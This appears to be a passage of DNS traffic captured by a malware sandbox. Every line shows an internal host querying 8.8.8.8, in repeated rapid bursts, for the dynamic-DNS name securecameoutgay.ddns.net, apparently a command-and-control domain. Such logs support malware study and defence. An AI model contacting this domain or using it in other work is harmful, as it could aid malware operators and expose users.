                                                    Oct 12, 2024 23:05:17.225996017 CEST192.168.2.148.8.8.80xdef7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.233720064 CEST192.168.2.148.8.8.80xdef7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.241499901 CEST192.168.2.148.8.8.80xdef7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.248620987 CEST192.168.2.148.8.8.80xdef7Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.256438017 CEST192.168.2.148.8.8.80x9a59Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.264470100 CEST192.168.2.148.8.8.80x9a59Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.271663904 CEST192.168.2.148.8.8.80x9a59Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.278925896 CEST192.168.2.148.8.8.80x9a59Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.286067009 CEST192.168.2.148.8.8.80x9a59Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.293912888 CEST192.168.2.148.8.8.80x3621Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.301235914 CEST192.168.2.148.8.8.80x3621Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.308327913 CEST192.168.2.148.8.8.80x3621Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.315637112 CEST192.168.2.148.8.8.80x3621Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.323064089 CEST192.168.2.148.8.8.80x3621Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.330883026 CEST192.168.2.148.8.8.80x6639Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.337858915 CEST192.168.2.148.8.8.80x6639Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.345088959 CEST192.168.2.148.8.8.80x6639Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.352138996 CEST192.168.2.148.8.8.80x6639Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.359275103 CEST192.168.2.148.8.8.80x6639Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.367362976 CEST192.168.2.148.8.8.80x71f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.374478102 CEST192.168.2.148.8.8.80x71f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.381836891 CEST192.168.2.148.8.8.80x71f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.389100075 CEST192.168.2.148.8.8.80x71f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.396253109 CEST192.168.2.148.8.8.80x71f8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.404304981 CEST192.168.2.148.8.8.80xe728Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.411588907 CEST192.168.2.148.8.8.80xe728Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.419552088 CEST192.168.2.148.8.8.80xe728Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.427228928 CEST192.168.2.148.8.8.80xe728Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.434770107 CEST192.168.2.148.8.8.80xe728Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.442529917 CEST192.168.2.148.8.8.80xf6acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.449692011 CEST192.168.2.148.8.8.80xf6acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.456715107 CEST192.168.2.148.8.8.80xf6acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.464286089 CEST192.168.2.148.8.8.80xf6acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.471587896 CEST192.168.2.148.8.8.80xf6acStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.479711056 CEST192.168.2.148.8.8.80x8983Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.486942053 CEST192.168.2.148.8.8.80x8983Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.494115114 CEST192.168.2.148.8.8.80x8983Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.501267910 CEST192.168.2.148.8.8.80x8983Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.508615971 CEST192.168.2.148.8.8.80x8983Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.516712904 CEST192.168.2.148.8.8.80x735cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.523736954 CEST192.168.2.148.8.8.80x735cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.531320095 CEST192.168.2.148.8.8.80x735cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.538603067 CEST192.168.2.148.8.8.80x735cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.545857906 CEST192.168.2.148.8.8.80x735cStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.553802013 CEST192.168.2.148.8.8.80xef8bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.561182022 CEST192.168.2.148.8.8.80xef8bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.568484068 CEST192.168.2.148.8.8.80xef8bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.575936079 CEST192.168.2.148.8.8.80xef8bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.583257914 CEST192.168.2.148.8.8.80xef8bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.592186928 CEST192.168.2.148.8.8.80x7685Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.599462986 CEST192.168.2.148.8.8.80x7685Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.606656075 CEST192.168.2.148.8.8.80x7685Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.613940954 CEST192.168.2.148.8.8.80x7685Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.621048927 CEST192.168.2.148.8.8.80x7685Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.628928900 CEST192.168.2.148.8.8.80xb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.636534929 CEST192.168.2.148.8.8.80xb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.643908024 CEST192.168.2.148.8.8.80xb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.651536942 CEST192.168.2.148.8.8.80xb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.658797026 CEST192.168.2.148.8.8.80xb8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.666593075 CEST192.168.2.148.8.8.80x677eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.674285889 CEST192.168.2.148.8.8.80x677eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.681555986 CEST192.168.2.148.8.8.80x677eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.689263105 CEST192.168.2.148.8.8.80x677eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.696330070 CEST192.168.2.148.8.8.80x677eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.704559088 CEST192.168.2.148.8.8.80x1867Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.711965084 CEST192.168.2.148.8.8.80x1867Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.719166040 CEST192.168.2.148.8.8.80x1867Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.726438046 CEST192.168.2.148.8.8.80x1867Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.733715057 CEST192.168.2.148.8.8.80x1867Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.741576910 CEST192.168.2.148.8.8.80x11a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.748800993 CEST192.168.2.148.8.8.80x11a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.756109953 CEST192.168.2.148.8.8.80x11a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.763632059 CEST192.168.2.148.8.8.80x11a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.771008968 CEST192.168.2.148.8.8.80x11a6Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.779144049 CEST192.168.2.148.8.8.80x3362Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.786775112 CEST192.168.2.148.8.8.80x3362Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.794131994 CEST192.168.2.148.8.8.80x3362Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.801302910 CEST192.168.2.148.8.8.80x3362Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.808446884 CEST192.168.2.148.8.8.80x3362Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.816634893 CEST192.168.2.148.8.8.80xae7bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.824120998 CEST192.168.2.148.8.8.80xae7bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.831566095 CEST192.168.2.148.8.8.80xae7bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.838702917 CEST192.168.2.148.8.8.80xae7bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.846237898 CEST192.168.2.148.8.8.80xae7bStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.854166985 CEST192.168.2.148.8.8.80x466fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.861376047 CEST192.168.2.148.8.8.80x466fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.868875980 CEST192.168.2.148.8.8.80x466fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.876511097 CEST192.168.2.148.8.8.80x466fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.884188890 CEST192.168.2.148.8.8.80x466fStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.892209053 CEST192.168.2.148.8.8.80x7ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.899516106 CEST192.168.2.148.8.8.80x7ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.906780958 CEST192.168.2.148.8.8.80x7ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.914278030 CEST192.168.2.148.8.8.80x7ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.921436071 CEST192.168.2.148.8.8.80x7ceStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.929363012 CEST192.168.2.148.8.8.80x744eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.936525106 CEST192.168.2.148.8.8.80x744eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.943995953 CEST192.168.2.148.8.8.80x744eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.951670885 CEST192.168.2.148.8.8.80x744eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.959443092 CEST192.168.2.148.8.8.80x744eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.968332052 CEST192.168.2.148.8.8.80xe9b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.976012945 CEST192.168.2.148.8.8.80xe9b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.983189106 CEST192.168.2.148.8.8.80xe9b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:17.994069099 CEST192.168.2.148.8.8.80xe9b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.001374006 CEST192.168.2.148.8.8.80xe9b8Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.009774923 CEST192.168.2.148.8.8.80x2421Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.019036055 CEST192.168.2.148.8.8.80x2421Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.026268005 CEST192.168.2.148.8.8.80x2421Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.037873983 CEST192.168.2.148.8.8.80x2421Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.051134109 CEST192.168.2.148.8.8.80x2421Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.061882973 CEST192.168.2.148.8.8.80x288aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.069468975 CEST192.168.2.148.8.8.80x288aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.077096939 CEST192.168.2.148.8.8.80x288aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.085047960 CEST192.168.2.148.8.8.80x288aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.092466116 CEST192.168.2.148.8.8.80x288aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.100883961 CEST192.168.2.148.8.8.80xeb06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.108076096 CEST192.168.2.148.8.8.80xeb06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.115413904 CEST192.168.2.148.8.8.80xeb06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.123258114 CEST192.168.2.148.8.8.80xeb06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.132531881 CEST192.168.2.148.8.8.80xeb06Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.140381098 CEST192.168.2.148.8.8.80x26e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.147689104 CEST192.168.2.148.8.8.80x26e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.155133963 CEST192.168.2.148.8.8.80x26e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.162015915 CEST192.168.2.148.8.8.80x26e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.169631004 CEST192.168.2.148.8.8.80x26e1Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.178236008 CEST192.168.2.148.8.8.80xaf60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.185796022 CEST192.168.2.148.8.8.80xaf60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.193074942 CEST192.168.2.148.8.8.80xaf60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.200186014 CEST192.168.2.148.8.8.80xaf60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.207562923 CEST192.168.2.148.8.8.80xaf60Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.215812922 CEST192.168.2.148.8.8.80xcfdbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.223118067 CEST192.168.2.148.8.8.80xcfdbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.230632067 CEST192.168.2.148.8.8.80xcfdbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.238126040 CEST192.168.2.148.8.8.80xcfdbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.245642900 CEST192.168.2.148.8.8.80xcfdbStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.253875017 CEST192.168.2.148.8.8.80xe04aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.261333942 CEST192.168.2.148.8.8.80xe04aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.268625021 CEST192.168.2.148.8.8.80xe04aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.276261091 CEST192.168.2.148.8.8.80xe04aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.283627987 CEST192.168.2.148.8.8.80xe04aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.291687965 CEST192.168.2.148.8.8.80x2d0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.300431967 CEST192.168.2.148.8.8.80x2d0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.307410002 CEST192.168.2.148.8.8.80x2d0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.316582918 CEST192.168.2.148.8.8.80x2d0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.326438904 CEST192.168.2.148.8.8.80x2d0dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.336765051 CEST192.168.2.148.8.8.80x7aa9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.345094919 CEST192.168.2.148.8.8.80x7aa9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.352195024 CEST192.168.2.148.8.8.80x7aa9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.359289885 CEST192.168.2.148.8.8.80x7aa9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.368948936 CEST192.168.2.148.8.8.80x7aa9Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.379707098 CEST192.168.2.148.8.8.80x5057Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.389991999 CEST192.168.2.148.8.8.80x5057Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.399573088 CEST192.168.2.148.8.8.80x5057Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.408921003 CEST192.168.2.148.8.8.80x5057Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.418538094 CEST192.168.2.148.8.8.80x5057Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.428816080 CEST192.168.2.148.8.8.80xc09dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.437932968 CEST192.168.2.148.8.8.80xc09dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.447468996 CEST192.168.2.148.8.8.80xc09dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.456773996 CEST192.168.2.148.8.8.80xc09dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.466211081 CEST192.168.2.148.8.8.80xc09dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.477020979 CEST192.168.2.148.8.8.80x5149Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.486602068 CEST192.168.2.148.8.8.80x5149Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.496153116 CEST192.168.2.148.8.8.80x5149Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.503353119 CEST192.168.2.148.8.8.80x5149Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.510755062 CEST192.168.2.148.8.8.80x5149Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.518687010 CEST192.168.2.148.8.8.80x1f7aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.526072025 CEST192.168.2.148.8.8.80x1f7aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.533664942 CEST192.168.2.148.8.8.80x1f7aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.541754007 CEST192.168.2.148.8.8.80x1f7aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.549422979 CEST192.168.2.148.8.8.80x1f7aStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.557687044 CEST192.168.2.148.8.8.80x1f7dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.565825939 CEST192.168.2.148.8.8.80x1f7dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.573476076 CEST192.168.2.148.8.8.80x1f7dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.580877066 CEST192.168.2.148.8.8.80x1f7dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.588243008 CEST192.168.2.148.8.8.80x1f7dStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.595974922 CEST192.168.2.148.8.8.80x7d52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.603034973 CEST192.168.2.148.8.8.80x7d52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.610367060 CEST192.168.2.148.8.8.80x7d52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.617997885 CEST192.168.2.148.8.8.80x7d52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.626135111 CEST192.168.2.148.8.8.80x7d52Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.634177923 CEST192.168.2.148.8.8.80xf0c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.641942024 CEST192.168.2.148.8.8.80xf0c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.649538994 CEST192.168.2.148.8.8.80xf0c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.657066107 CEST192.168.2.148.8.8.80xf0c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.664643049 CEST192.168.2.148.8.8.80xf0c5Standard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.673511982 CEST192.168.2.148.8.8.80x808eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.681018114 CEST192.168.2.148.8.8.80x808eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.688380003 CEST192.168.2.148.8.8.80x808eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
                                                    Oct 12, 2024 23:05:18.695997953 CEST192.168.2.148.8.8.80x808eStandard query (0)securecameoutgay.ddns.netA (IP address)IN (0x0001)false
